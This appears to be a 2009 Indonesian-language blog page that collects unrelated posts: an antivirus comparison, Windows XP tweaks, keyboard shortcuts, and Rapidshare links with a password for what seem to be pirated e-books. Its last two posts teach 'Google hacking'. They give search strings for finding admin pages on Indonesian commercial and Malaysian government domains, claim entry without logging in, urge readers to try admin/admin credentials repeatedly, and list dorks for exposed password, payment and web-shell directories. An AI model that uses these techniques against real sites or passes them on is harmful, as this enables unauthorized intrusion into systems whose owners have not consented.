Jumat, Agustus 21, 2009

ANTIVIRUS

1. Kaspersky Anti Virus 6
http://images.pcworld.com/reviews/graphics/products/2007/04.09.07/25807_92.jpg

• Download price when reviewed: $50 ($35 renewal)
• Malware detection rate: 96%
• Proactive detection: 51%
• System slowdown: 10%
• Ease of use: Superior
• False-positive detections:


2. Symantec Norton AntiVirus 2007
http://images.pcworld.com/reviews/graphics/products/2007/04.09.07/25808_92.jpg

• Download price when reviewed: $40 ($39 renewal)
• Malware detection rate: 96%
• Proactive detection: 49%
• System slowdown: 10%
• Ease of use: Superior
• False-positive detections: 3

3. BitDefender Antivirus 10
http://images.pcworld.com/reviews/graphics/products/2007/04.09.07/25806_92.jpg

• Download price when reviewed: $30 ($22 renewal)
• Malware detection rate: 96%
• Proactive detection: 61%
• System slowdown: 124%
• Ease of use: Superior
• False-positive detections: 14

4. ESET NOD32
http://images.pcworld.com/reviews/graphics/products/2007/04.09.07/25811_92.jpg

• Download price when reviewed: $39 ($27 renewal)
• Malware detection rate: 90%
• Proactive detection: 79%
• System slowdown: 5%
• Ease of use: Very Good
• False-positive detections: 6

5. Panda Antivirus 2007
http://images.pcworld.com/reviews/graphics/products/2007/04.09.07/25809_92.jpg

• Download price when reviewed: $30 ($30 renewal)
• Malware detection rate: 90%
• Proactive detection: 56%
• System slowdown: 4%
• Ease of use: Very Good
• False-positive detections: 3

6. Alwil Avast 4 Antivirus Professional Edition
http://images.pcworld.com/reviews/graphics/products/2007/04.09.07/25813_92.jpg

• Download price when reviewed: $40 ($28 renewal)
• Malware detection rate: 92%
• Proactive detection: 37%
• System slowdown: 4%
• Ease of use: Good
• False-positive detections: 5

7. Grisoft AVG 7.5 Anti-Virus Professional
http://images.pcworld.com/reviews/graphics/products/2007/04.09.07/25812_92.jpg

• Download price when reviewed: $30 ($15 renewal)
• Malware detection rate: 91%
• Proactive detection: 34%
• System slowdown: 2%
• Ease of use: Good
• False-positive detections: 1

8. Trend Micro AntiVirus Plus AntiSpyware 2007
http://images.pcworld.com/reviews/graphics/products/2007/04.09.07/25810_92.jpg

• Download price when reviewed: $40 ($40 renewal)
• Malware detection rate: 82%
• Proactive detection: 43%
• System slowdown: 9%
• Ease of use: Very Good
• False-positive detections: 0

Source :
http://www.pcworld.com/article/id,130869-page,1/article.html

cuma pingin bagi2 aja buad yg malas buka linknya :D

Faster XP

Faster Windows XP

A recent study of our team on how to better our Windows XP systems comissioned to create an eBook on the subject for the main team at MPortela led us to investigate a countless number of details on how to better your performance and machine.

Some of the working tweaks you can do to your Windows XP can really be a blessing to your system’s speed. So I thought about sharing with you the safe tweaks on how to have a faster Windows XP. As a disclaimer do the following tweaks at your own risk, however they were all tested and are in use by most of our team members and friends.


A. DISABLE INDEXING SERVICES

Indexing Services is a small little program that uses large amounts of RAM and can often make a computer endlessly loud and noisy. This system process indexes and updates lists of all the files that are on your computer. It does this so that when you do a search for something on your computer, it will search faster by scanning the index lists. If you don’t search your computer often, or even if you do search often, this system service is completely unnecessary. To disable do the following:

1. Go to Start
2. Click Settings
3. Click Control Panel
4. Double-click Add/Remove Programs
5. Click the Add/Remove Window Components
6. Uncheck the Indexing services
7. Click Next


B. OPTIMISE DISPLAY SETTINGS

Windows XP can look sexy but displaying all the visual items can waste system resources. To optimise:

1.Go to Start
2. Click Settings
3. Click Control Panel
4. Click System
5. Click Advanced tab
6. In the Performance tab click Settings
7. Leave only the following ticked:
- Show shadows under menus
- Show shadows under mouse pointer
- Show translucent selection rectangle
- Use drop shadows for icons labels on the desktop
- Use visual styles on windows and buttons


C. SPEEDUP FOLDER BROWSING

You may have noticed that everytime you open my computer to browse folders that there is a slight delay. This is because Windows XP automatically searches for network files and printers everytime you open Windows Explorer. To fix this and to increase browsing significantly:

1. Open My Computer
2. Click on Tools menu
3. Click on Folder Options
4. Click on the View tab.
5. Uncheck the Automatically search for network folders and printers check box
6. Click Apply
7. Click Ok
8. Reboot your computer


D. IMPROVE MEMORY USAGE

Cacheman Improves the performance of your computer by optimizing the disk cache, memory and a number of other settings.
NOTE: This program is shareware and some features require activation.
Once Installed:

1.Go to Show Wizard and select All
2.Run all the wizards by selecting Next or Finished until you are back to the main menu. Use the defaults unless you know exactly what you are doing.
3.Exit and Save Cacheman
4.Restart Windows


E. OPTIMISE YOUR INTERNET CONNECTION

There are lots of ways to do this but by far the easiest is to run TCP/IP Optimizer.

1. Download and install
2. Click the General Settings tab and select your Connection Speed (Kbps)
3. Click Network Adapter and choose the interface you use to connect to the Internet
4. Check Optimal Settings then Apply
5. Reboot


F. OPTIMISE YOUR PAGEFILE

If you give your pagefile a fixed size it saves the operating system from needing to resize the page file.

1. Right click on My Computer and select Properties
2. Select the Advanced tab
3. Under Performance choose the Settings button
4. Select the Advanced tab again and under Virtual Memory select Change
5. Highlight the drive containing your page file and make the initial Size of the file the same as the Maximum Size of the file.

Windows XP sizes the page file to about 1.5X the amount of actual physical memory by default. While this is good for systems with smaller amounts of memory (under 512MB) it is unlikely that a typical XP desktop system will ever need 1.5 X 512MB or more of virtual memory. If you have less than 512MB of memory, leave the page file at its default size. If you have 512MB or more, change the ratio to 1:1 page file size to physical memory size.


G. SPEEDUP FOLDER ACCESS - DISABLE LAST ACCESS UPDATE

If you have a lot of folders and subdirectories on your computer, when you access a directory XP wastes a lot of time updating the time stamp showing the last access time for that directory and for ALL sub directories. To stop XP doing this you need to edit the registry. If you are uncomfortable doing this then please do not attempt.

1. Go to Start and then Run and type “regedit”
2. Click through the file system until you get to “HKEY_LOCAL_MACHINE\ System\CurrentControlSet\Control\FileSystem”
3. Right-click in a blank area of the window on the right and select ‘DWORD Value’
4. Create a new DWORD Value called ‘NtfsDisableLastAccessUpdate’
5. Then Right click on the new value and select ‘Modify’
6. Change the Value Data to ‘1′
7. Click ‘OK’


H. MAKE YOUR MENUS LOAD FASTER

This is one of my favourite tweaks as it makes a huge difference to how fast your machine will ‘feel’. What this tweak does is remove the slight delay between clicking on a menu and XP displaying the menu.

1. Go to Start then Run
2. Type ‘Regedit’ then click ‘Ok’
3. Find “HKEY_CURRENT_USER\Control Panel\Desktop\”
4. Select “MenuShowDelay”
5. Right click and select “Modify’
6. Reduce the number to around “100″
7. This is the delay time before a menu is opened. You can set it to “0″ but it can make windows really hard to use as menus will open if you just look at them - well move your mouse over them anyway. I tend to go for anywhere between 50-150 depending on my mood


I. IMPROVE XP SHUTDOWN SPEED

This tweak reduces the time XP waits before automatically closing any running programs when you give it the command to shutdown.

1. Go to Start then select Run
2. Type ‘Regedit’ and click ok
3. Find ‘HKEY_CURRENT_USER\ Control Panel\Desktop\’
4. Select ‘WaitToKillAppTimeout’
5. Right click and select ‘Modify’
6. Change the value to ‘1000′
7. Click ‘OK’
8. Now select ‘HungAppTimeout’
9. Right click and select ‘Modify’
10. Change the value to ‘1000′
11. Click ‘OK’
12. Now find ‘HKEY_USERS\ .DEFAULT\Control Panel\Desktop’
13. Select ‘WaitToKillAppTimeout’
14. Right click and select ‘Modify’
15. Change the value to ‘1000′
16. Click ‘OK’
17. Now find ‘HKEY_LOCAL_MACHINE\ System\CurrentControlSet\Control\’
18. Select ‘WaitToKillServiceTimeout’
19. Right click and select ‘Modify’
20. Change the value to ‘1000′
21. Click ‘OK’


J. IMPROVE SWAPFILE PERFORMANCE

If you have more than 256MB of RAM this tweak will considerably improve your performance. It basically makes sure that your PC uses every last drop of memory (faster than swap file) before it starts using the swap file.

1. Go to Start then Run
2. Type “msconfig.exe” then ok
3. Click on the System.ini tab
4. Expand the 386enh tab by clicking on the plus sign
5. Click on new then in the blank box type”ConservativeSwapfileUsage=1″
6. Click OK
7. Restart PC


K. ENSURE XP IS USING DMA MODE

XP enables DMA for Hard-Drives and CD-Roms by default on most ATA or ATAPI (IDE) devices. However, sometimes computers switch to PIO mode which is slower for data transfer - a typical reason is because of a virus. To ensure that your machine is using DMA:

1. Open ‘Device Manager’
2. Double-click ‘IDE ATA/ATAPI Controllers’
3. Right-click ‘Primary Channel’ and select ‘Properties’ and then ‘Advanced Settings’
4. In the ‘Current Transfer Mode’ drop-down box, select ‘DMA if Available’ if the current setting is ‘PIO Only’

PC HACK

More, better, faster, cheaper, easier, cooler, safer. All of these and more capture our desire to understand and get the most out of the investment we’ve made in our PCs. From making a PC boot faster, to improving its reliability, to using multiple operating systems, to being able to recover quickly when something goes wrong, the PC hacks in this book will improve your PC experience and make you a lot more computer-savvy.The term hacking has a bad reputation in the press. They use it to refer to someone who breaks into systems or wreaks havoc with computers as their weapon. Among people who write code, though, the term hack refers to a “quick-and-dirty” solution to a problem or a clever way to get something done. And the term hacker is taken very much as a compliment, indicating that someone is being creative, having the technical chops to get things done. The Hacks series is an attempt to reclaim the word, document the good ways people are hacking, and pass the hacker ethic of creative participation on to the uninitiated. Seeing how others approach systems and problems is often the quickest way to learn about a new technology.
Since you’ll be hacking your PC, and it probably contains all your data, never more than ever are you most strongly encouraged to follow three basic tenets of PC ownership: back up, Back Up, and BACK UP! While we won’t intentionally lead you through a hack that will harm your system, life with a PC is not a matter of if your system will crash, but when. Backups, system restore points, software and hardware installation disks, and printouts of hard-to-remember or obscure details are very handy to keep safe but close at hand should you need them.

TABLE OF CONTENT:
Chapter 01 - Basic System Board Hacks
Chapter 02 - Basic System Board Setup
Chapter 03 - CPU Hacks
Chapter 04 - Memory Hacks
Chapter 05 - Disk Hacks
Chapter 06 - Disk Drive Performance Hacks
Chapter 07 - Video Hacks
Chapter 08 - I/O Device Hacks
Chapter 09 - Boot-Up Hacks
Chapter 10 - Configuring a New PC



http://rapidshare.com/files/16299579/PC_Ha.rar




PASSWORD: Augustiner

REDHAT LINUX

Dètàìls

Title.....................: Red Hat linux 9 professional secret
Type....................: e-Book
Part Size..............:
Compression .......: RAR
File Validation.......: SFV


Iñƒórmàtìóñ

Red Hat linux 9 professional secrets
Wiley (August 2003) | Language: English | ISBN: 0764541331 | 1080 Pages | 12,4 MB | Rapidshare.com



* The ultimate guide to what's under the hood of Red Hat Linux 9, completely revised to unlock its deepest secrets
* Designed to answer the questions of intermediate-to-advanced Red Hat Linux users who really want to understand the ins and outs of Red Hat Linux and what goes on behind the scenes
* Takes the reader beyond the obvious information about this complicated operating system, revealing hidden features, tricks and alternate methods that can't be easily found elsewhere: little-known installation options, ways to tweak the TCP/IP configuration files for maximum network efficiency, techniques for optimizing OpenOffice, and much more
* Includes two CD-ROMS containing Red Hat Linux 9 Publisher's Edition




Dówñlóàd




http://rapidshare.com/files/5054375/r_h_linux_9_professional_secrets.rar



eNjoY

WINDOWS

Semoga berguna

Windows Shortcut

Run Commands
-----------------------------------------------------------
compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 _ System Information
sysedit _ System Edit
win.ini _ windows loading information(also system.ini)
winver _ Shows current version of windows
mailto: _ Opens default email client
command _ Opens command prompt

Run Commands to access the control panel
-------------------------------------------------------------------
Add/Remove Programs control appwiz.cpl
Date/Time Properties control timedate.cpl
Display Properties control desk.cpl
FindFast control findfast.cpl
Fonts Folder control fonts
Internet Properties control inetcpl.cpl
Keyboard Properties control main.cpl keyboard
Mouse Properties control main.cpl
Multimedia Properties control mmsys.cpl
Network Properties control netcpl.cpl
Password Properties control password.cpl
Printers Folder control printers
Sound Properties control mmsys.cpl sounds
System Properties control sysdm.cpl


Command Prompt
--------------------------------------------------------------
ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
ARP Displays, adds, and removes arp information from network devices.
ASSIGN Assign a drive letter to an alternate letter.
ASSOC View the file associations.
AT Schedule a time to execute commands or programs.
ATMADM Lists connections and addresses seen by Windows ATM call manager.
ATTRIB Display and change file attributes.
BATCH Recovery console command that executes a series of commands in a file.
BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK Enable / disable CTRL + C feature.
CACLS View and modify file ACL's.
CALL Calls a batch file from another batch file.
CD Changes directories.
CHCP Supplement the International keyboard and character set information.
CHDIR Changes directories.
CHKDSK Check the hard disk drive running FAT for errors.
CHKNTFS Check the hard disk drive running NTFS for errors.
CHOICE Specify a listing of multiple options within a batch file.
CLS Clears the screen.
CMD Opens the command interpreter.
COLOR Easily change the foreground and background color of the MS-DOS window.
COMP Compares files.
COMPACT Compresses and uncompress files.
CONTROL Open control panel icons from the MS-DOS prompt.
CONVERT Convert FAT to NTFS.
COPY Copy one or more files to an alternate location.
CTTY Change the computers input/output devices.
DATE View or change the systems date.
DEBUG Debug utility to create assembly programs to modify hardware settings.
DEFRAG Re-arrange the hard disk drive to help with loading programs.
DEL Deletes one or more files.
DELETE Recovery console command that deletes a file.
DELTREE Deletes one or more files and/or directories.
DIR List the contents of one or more directory.
DISABLE Recovery console command that disables Windows system services or drivers.
DISKCOMP Compare a disk with another disk.
DISKCOPY Copy the contents of one disk and place them on another disk.
DOSKEY Command to view and execute commands that have been run in the past.
DOSSHELL A GUI to help with early MS-DOS users.
DRIVPARM Enables overwrite of original device drivers.
ECHO Displays messages and enables and disables echo.
EDIT View and edit files.
EDLIN View and edit files.
EMM386 Load extended Memory Manager.
ENABLE Recovery console command to enable a disable service or driver.
ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
ERASE Erase files from computer.
EXIT Exit from the command interpreter.
EXPAND Expand a Microsoft Windows file back to it's original format.
EXTRACT Extract files from the Microsoft Windows cabinets.
FASTHELP Displays a listing of MS-DOS commands and information about them.
FC Compare files.
FDISK Utility used to create partitions on the hard disk drive.
FIND Search for text within a file.
FINDSTR Searches for a string of text within a file.
FIXBOOT Writes a new boot sector.
FIXMBR Writes a new boot record to a disk drive.
FOR Boolean used in batch files.
FORMAT Command to erase and prepare a disk drive.
FTP Command to connect and operate on a FTP server.
FTYPE Displays or modifies file types used in file extension associations.
GOTO Moves a batch file to a specific label or location.
GRAFTABL Show extended characters in graphics mode.
HELP Display a listing of commands and brief explanation.
IF Allows for batch files to perform conditional processing.
IFSHLP.SYS 32-bit file manager.
IPCONFIG Network command to view network adapter settings and assigned values.
KEYB Change layout of keyboard.
LABEL Change the label of a disk drive.
LH Load a device driver in to high memory.
LISTSVC Recovery console command that displays the services and drivers.
LOADFIX Load a program above the first 64k.
LOADHIGH Load a device driver in to high memory.
LOCK Lock the hard disk drive.
LOGON Recovery console command to list installations and enable administrator login.
MAP Displays the device name of a drive.
MD Command to create a new directory.
MEM Display memory on system.
MKDIR Command to create a new directory.
MODE Modify the port or display settings.
MORE Display one page at a time.
MOVE Move one or more files from one directory to another directory.
MSAV Early Microsoft Virus scanner.
MSD Diagnostics utility.
MSCDEX Utility used to load and provide access to the CD-ROM.
NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT
NET Update, fix, or view the network or network settings
NETSH Configure dynamic and static network information from MS-DOS.
NETSTAT Display the TCP/IP network protocol statistics and information.
NLSFUNC Load country specific information.
NSLOOKUP Look up an IP address of a domain or host on a network.
PATH View and modify the computers path location.
PATHPING View and locate locations of network latency.
PAUSE Command used in batch files to stop the processing of a command.
PING Test / send information to another network computer or network device.
POPD Changes to the directory or network path stored by the pushd command.
POWER Conserve power with computer portables.
PRINT Prints data to a printer port.
PROMPT View and change the MS-DOS prompt.
PUSHD Stores a directory or network path in memory so it can be returned to at any time.
QBASIC Open the QBasic.
RD Removes an empty directory.
REN Renames a file or directory.
RENAME Renames a file or directory.
RMDIR Removes an empty directory.
ROUTE View and configure windows network route tables.
RUNAS Enables a user to execute a program on another computer.
SCANDISK Run the scandisk utility.
SCANREG Scan registry and recover registry from errors.
SET Change one variable or string to another.
SETLOCAL Enables local environments to be changed without affecting anything else.
SETVER Change MS-DOS version to trick older MS-DOS programs.
SHARE Installs support for file sharing and locking capabilities.
SHIFT Changes the position of replaceable parameters in a batch program.
SHUTDOWN Shutdown the computer from the MS-DOS prompt.
SMARTDRV Create a disk cache in conventional memory or extended memory.
SORT Sorts the input and displays the output to the screen.
START Start a separate window in Windows from the MS-DOS prompt.
SUBST Substitute a folder on your computer for another drive letter.
SWITCHES Remove add functions from MS-DOS.
SYS Transfer system files to disk drive.
TELNET Telnet to another computer / device from the prompt.
TIME View or modify the system time.
TITLE Change the title of their MS-DOS window.
TRACERT Visually view a network packets route across a network.
TREE View a visual tree of the hard disk drive.
TYPE Display the contents of a file.
UNDELETE Undelete a file that has been deleted.
UNFORMAT Unformat a hard disk drive.
UNLOCK Unlock a disk drive.
VER Display the version information.
VERIFY Enables or disables the feature to determine if files have been written properly.
VOL Displays the volume information about the designated drive.
XCOPY Copy multiple files, directories, and/or drives from one location to another.
TRUENAME When placed before a file, will display the whole directory in which it exists
TASKKILL It allows you to kill those unneeded or locked up applications

================================================== ==============================

Windows XP Shortcuts
--------------------------------------------------------------
ALT+- (ALT+hyphen) Displays the Multiple Document Interface (MDI) child window's System menu
ALT+ENTER View properties for the selected item
ALT+ESC Cycle through items in the order they were opened
ALT+F4 Close the active item, or quit the active program
ALT+SPACEBAR Display the System menu for the active window
ALT+TAB Switch between open items
ALT+Underlined letter Display the corresponding menu
BACKSPACE View the folder one level up in My Computer or Windows Explorer
CTRL+A Select all
CTRL+B Bold
CTRL+C Copy
CTRL+I Italics
CTRL+O Open an item
CTRL+U Underline
CTRL+V Paste
CTRL+X Cut
CTRL+Z Undo
CTRL+F4 Close the active document
CTRL while dragging Copy selected item
CTRL+SHIFT while dragging Create shortcut to selected iteM
CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word
CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word
CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph
CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph
SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin
ESC Cancel the current task
F1 Displays Help
F2 Rename selected item
F3 Search for a file or folder
F4 Display the Address bar list in My Computer or Windows Explorer
F5 Refresh the active window
F6 Cycle through screen elements in a window or on the desktop
F10 Activate the menu bar in the active program
SHIFT+F10 Display the shortcut menu for the selected item
CTRL+ESC Display the Start menu
SHIFT+CTRL+ESC Launches Task Manager
SHIFT when you insert a CD Prevent the CD from automatically playing
WIN Display or hide the Start menu
WIN+BREAK Display the System Properties dialog box
WIN+D Minimizes all Windows and shows the Desktop
WIN+E Open Windows Explorer
WIN+F Search for a file or folder
WIN+F+CTRL Search for computers
WIN+L Locks the desktop
WIN+M Minimize or restore all windows
WIN+R Open the Run dialog box
WIN+TAB Switch between open items





Windows Explorer Shortcuts
-------------------------------------------------------------
ALT+SPACEBAR - Display the current window’s system menu
SHIFT+F10 - Display the item's context menu
CTRL+ESC - Display the Start menu
ALT+TAB - Switch to the window you last used
ALT+F4 - Close the current window or quit
CTRL+A - Select all items
CTRL+X - Cut selected item(s)
CTRL+C - Copy selected item(s)
CTRL+V - Paste item(s)
CTRL+Z - Undo last action
CTRL+(+) - Automatically resize the columns in the right hand pane
TAB - Move forward through options
ALT+RIGHT ARROW - Move forward to a previous view
ALT+LEFT ARROW - Move backward to a previous view
SHIFT+DELETE - Delete an item immediately
BACKSPACE - View the folder one level up
ALT+ENTER - View an item’s properties
F10 - Activate the menu bar in programs
F6 - Switch between left and right panes
F5 - Refresh window contents
F3 - Display Find application
F2 - Rename selected item



Internet Explorer Shortcuts
--------------------------------------------------------------
CTRL+A - Select all items on the current page
CTRL+D - Add the current page to your Favorites
CTRL+E - Open the Search bar
CTRL+F - Find on this page
CTRL+H - Open the History bar
CTRL+I - Open the Favorites bar
CTRL+N - Open a new window
CTRL+O - Go to a new location
CTRL+P - Print the current page or active frame
CTRL+S - Save the current page
CTRL+W - Close current browser window
CTRL+ENTER - Adds the http://www. (url) .com
SHIFT+CLICK - Open link in new window
BACKSPACE - Go to the previous page
ALT+HOME - Go to your Home page
HOME - Move to the beginning of a document
TAB - Move forward through items on a page
END - Move to the end of a document
ESC - Stop downloading a page
F11 - Toggle full-screen view
F5 - Refresh the current page
F4 - Display list of typed addresses
F6 - Change Address bar and page focus
ALT+RIGHT ARROW - Go to the next page
SHIFT+CTRL+TAB - Move back between frames
SHIFT+F10 - Display a shortcut menu for a link
SHIFT+TAB - Move back through the items on a page
CTRL+TAB - Move forward between frames
CTRL+C - Copy selected items to the clipboard
CTRL+V - Insert contents of the clipboard
ENTER - Activate a selected link
HOME - Move to the beginning of a document
END - Move to the end of a document
F1 - Display Internet Explorer Help

================================================== ==============================

Windows System Key Combinations
• F1: Help
• CTRL+ESC: Open Start menu
• ALT+TAB: Switch between open programs
• ALT+F4: Quit program
• SHIFT+DELETE: Delete item permanently

Windows Program Key Combinations
• CTRL+C: Copy
• CTRL+X: Cut
• CTRL+V: Paste
• CTRL+Z: Undo
• CTRL+B: Bold
• CTRL+U: Underline
• CTRL+I: Italic

Mouse Click/Keyboard Modifier Combinations for Shell Objects
• SHIFT+right click: Displays a shortcut menu containing alternative commands
• SHIFT+double click: Runs the alternate default command (the second item on the menu)
• ALT+double click: Displays properties
• SHIFT+DELETE: Deletes an item immediately without placing it in the Recycle Bin

General Keyboard-Only Commands
• F1: Starts Windows Help
• F10: Activates menu bar options
• SHIFT+F10 Opens a shortcut menu for the selected item (this is the same as right-clicking an object
• CTRL+ESC: Opens the Start menu (use the ARROW keys to select an item)
• CTRL+ESC or ESC: Selects the Start button (press TAB to select the taskbar, or press SHIFT+F10 for a context menu)
• ALT+DOWN ARROW: Opens a drop-down list box
• ALT+TAB: Switch to another running program (hold down the ALT key and then press the TAB key to view the task-switching window)
• SHIFT: Press and hold down the SHIFT key while you insert a CD-ROM to bypass the automatic-run feature
• ALT+SPACE: Displays the main window's System menu (from the System menu, you can restore, move, resize, minimize, maximize, or close the window)
• ALT+- (ALT+hyphen): Displays the Multiple Document Interface (MDI) child window's System menu (from the MDI child window's System menu, you can restore, move, resize, minimize, maximize, or close the child window)
• CTRL+TAB: Switch to the next child window of a Multiple Document Interface (MDI) program
• ALT+underlined letter in menu: Opens the menu
• ALT+F4: Closes the current window
• CTRL+F4: Closes the current Multiple Document Interface (MDI) window
• ALT+F6: Switch between multiple windows in the same program (for example, when the Notepad Find dialog box is displayed, ALT+F6 switches between the Find dialog box and the main Notepad window)

Properties Control
• CTRL+TAB/CTRL+SHIFT+TAB: Move through the property tabs

Accessibility Shortcuts
• Press SHIFT five times: Toggles StickyKeys on and off
• Press down and hold the right SHIFT key for eight seconds: Toggles FilterKeys on and off
• Press down and hold the NUM LOCK key for five seconds: Toggles ToggleKeys on and off
• Left ALT+left SHIFT+NUM LOCK: Toggles MouseKeys on and off
• Left ALT+left SHIFT+PRINT SCREEN: Toggles high contrast on and off

M'zoft Natural Keyboard Keys
• Windows Logo: Start menu
• Windows Logo+R: Run dialog box
• Windows Logo+M: Minimize all
• SHIFT+Windows Logo+M: Undo minimize all
• Windows Logo+F1: Help
• Windows Logo+E: Windows Explorer
• Windows Logo+F: Find files or folders
• Windows Logo+D: Minimizes all open windows and displays the desktop
• CTRL+Windows Logo+F: Find computer
• CTRL+Windows Logo+TAB: Moves focus from Start, to the Quick Launch toolbar, to the system tray (use RIGHT ARROW or LEFT ARROW to move focus to items on the Quick Launch toolbar and the system tray)
• Windows Logo+TAB: Cycle through taskbar buttons
• Windows Logo+Break: System Properties dialog box
• Application key: Displays a shortcut menu for the selected item

M'zoft Natural Keyboard with IntelliType Software Installed
• Windows Logo+L: Log off Windows
• Windows Logo+P: Starts Print Manager
• Windows Logo+C: Opens Control Panel
• Windows Logo+V: Starts Clipboard
• Windows Logo+K: Opens Keyboard Properties dialog box
• Windows Logo+I: Opens Mouse Properties dialog box
• Windows Logo+A: Starts Accessibility Options (if installed)
• Windows Logo+SPACEBAR: Displays the list of M'zoft IntelliType shortcut keys
• Windows Logo+S: Toggles CAPS LOCK on and off

Dialog Box Keyboard Commands
• TAB: Move to the next control in the dialog box
• SHIFT+TAB: Move to the previous control in the dialog box
• SPACEBAR: If the current control is a button, this clicks the button. If the current control is a check box, this toggles the check box. If the current control is an option, this selects the option.
• ENTER: Equivalent to clicking the selected button (the button with the outline)
• ESC: Equivalent to clicking the Cancel button
• ALT+underlined letter in dialog box item: Move to the corresponding item


Shell Objects and General Folder/Windows Explorer Shortcuts

For a selected object
• F2: Rename object
• F3: Find all files
• CTRL+X: Cut
• CTRL+C: Copy
• CTRL+V: Paste
• SHIFT+DELETE: Delete selection immediately, without moving the item to the Recycle Bin
• ALT+ENTER: Open the properties for the selected object

To Copy a File
Press and hold down the CTRL key while you drag the file to another folder.

To Create a Shortcut
Press and hold down CTRL+SHIFT while you drag a file to the desktop or a folder.

General Folder/Shortcut Control
• F4: Selects the Go To A Different Folder box and moves down the entries in the box (if the toolbar is active in Windows Explorer)
• F5: Refreshes the current window.
• F6: Moves among panes in Windows Explorer
• CTRL+G: Opens the Go To Folder tool (in Windows 95 Windows Explorer only)
• CTRL+Z: Undo the last command
• CTRL+A: Select all the items in the current window
• BACKSPACE: Switch to the parent folder
• SHIFT+click+Close button: For folders, close the current folder plus all parent folders

Windows Explorer Tree Control
• Numeric Keypad *: Expands everything under the current selection
• Numeric Keypad +: Expands the current selection
• Numeric Keypad -: Collapses the current selection.
• RIGHT ARROW: Expands the current selection if it is not expanded, otherwise goes to the first child
• LEFT ARROW: Collapses the current selection if it is expanded, otherwise goes to the parent

HACKING WITH GOOGLE

Google adalah sebuah mesin pencari, dimana kita dapat mencari hal- hal yang kita tidak ketahui :-/ dengan memasukkan keyword yang berhubungan dengan hal yang ingin kita cari lewat google :-O . Hanya itu kah /?

Tapi Selain Itu Google Juga Mempunyai Operator - Operator Spesial Seperti :D :

intitle:
Syntax ini memungkinkan kita melakukan search berdasarkan title atau judul dari halaman web.

inurl:
Syntax ini memungkinkan kita melakukan search berdasarkan url.

site:
Syntax ini digunakan untuk membatasi pencarian pada site atau domain tertentu.

filetype:
Syntax ini digunakan membantu kita untuk membatasi pencarian terhadap file dengan ekstensi tertentu saja.

link:
Syntax ini akan menampilkan halaman- halaman web yang mempunyai link ke situs tertentu.

intext:
Syntax ini dapat membantu kita untuk melakukan pencarian terhadap kata- kata tertentu sesuai dengan keyword pada website yang di tuju.

Oke, sekarang kita mencoba keyword yang pertama, kita masukkan word :
Intitle:”administrator page” Logout
Atau
Intitle:”administrator page” “Log out”

Dari keyword diatas, saya bermaksud memerintahkan Google untuk mencari halaman web yang berjudul administrator page :-O dan dihalaman tersebut terdapat kata Log out. Saya rasa anda sekarang sudah mulai paham apa maksud saya tersebut :>

Dari hasil result Google, akhirnya saya bisa memasuki ruang ADMIN :-O , tanpa harus login terlebih dahulu tentunya :-O. Tapi, tidak semua dari result Google tsb berhasil /heh. Ada baiknya jika anda mencoba satu persatu /no1

Sekarang kita coba dengan keyword yang kedua, kita masukkan word :
site:.co.id inurl:admin
Dari keyword diatas, saya bermaksud memerintahkan Google untuk mencari halaman web yang di urlnya terdapat kata admin dan pencarian dibatasi hanya pada web yang mempunyai domain .co.id :-/

Anda pasti sudah tahu domain .id ialah domain kepunyaan Negara Indonesia /pif .
Dari result yang ditampilkan oleh Google, kita bisa memasuki ruang ADMIN tanpa harus login terlebih dahulu :-O dan ada juga yang harus login terlebih dahulu /sob . Tapi jangan khawatir, jika anda dipaksa utk login terlebih dahulu, cobalah ini :
Login ID : admin
Password : admin
Ingat /! !! tidak semua nya berhasil lowch… Kita Harus Mencoba , Mencoba N Mencoba Lagi /heh Cape Dech /omg

Untuk selanjutnya kita coba keyword yg ketiga, yaitu :
site:.gov.my inurl:admin (WEB Malaysia)

Pengertiannya tidak berbeda jauh dengan keyword yang kedua. Hanya saja pada keyword yang ketiga ini kita membatasi pencarian pada domain .gov.my .

Saya rasa, informasi ini sudah cukup untuk menambah sedikit wawasan kita :x tentang Google, Entah itu Google sebagai MESIN PENCARI atau MESIN HACKING /no1

MANFAAT GOOGLE

---=| I N T R O



Apapun kesulitan anda google 90% dapat membantu anda, akan menjadi 99% jika anda mau berusaha,
dan 100% jika anda memiliki 1% yang beral dari keberuntungan anda. Dengan google kita dapat cari beasiswa,
online-store, exploit, literatur, berita, help, program, ataupun mempromosikan website kita.
Pada artikel ini saya akan mencoba menerangkan sisi buruk dengan adanya Google (http://www.google.com)
yang dapat menyebabkan server kita dapat di “CRACK” no “HACK” oleh tangan-tangan baik
yang ingin mencari sesuatu yang baru. Kita dapat sangat diuntungkan dengan google tapi dapat
pula sangat dirugikan. Tapi saya kira pembaca artikel ini kebanyakan orang yang pengen diuntungkan dengan adanya google ?





---=| S T A R T



Rediiii, siaaapppp, mari kita lihta sisi buruk google bersama-sama. Yang perlu anda lakukan :

Belajar mengetik dan membaca menggunakan computer ?
Koneksi internet
Program browser terserah, dan program wajib irc untuk konek ke jembuut
Baca berita di bawah ini


Karena sulit untuk dijelaskan, maka langsung contoh saja :

Masukkan kata kunci "index of/root"


"index of/root" - Google Search (http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=%22index+of%2Froot%22&btnG=Google+Search)



akan menghasilkan 4850 halaman yang berisi "index of/root"



keterangan : tanda “ “ digunakan untuk menyertakan semua kata di dalam tanda “ “ dan berurutan untuk mencari

index of/root kemungkinan besar adalah webroot dari suatu server



Ok, dengan kata kunci tersebut anda tahu apa yang anda dapatkan ?. Kata kunci apa saja yang menghasilkan sesuatu yang mendebarkan :



"Index of /admin"
"Index of /phpshell.php"
"Index of /cgitelnet.pl"
"Index of /album.pl"
"Index of /order"
"Index of /payment"
"Index of /password"
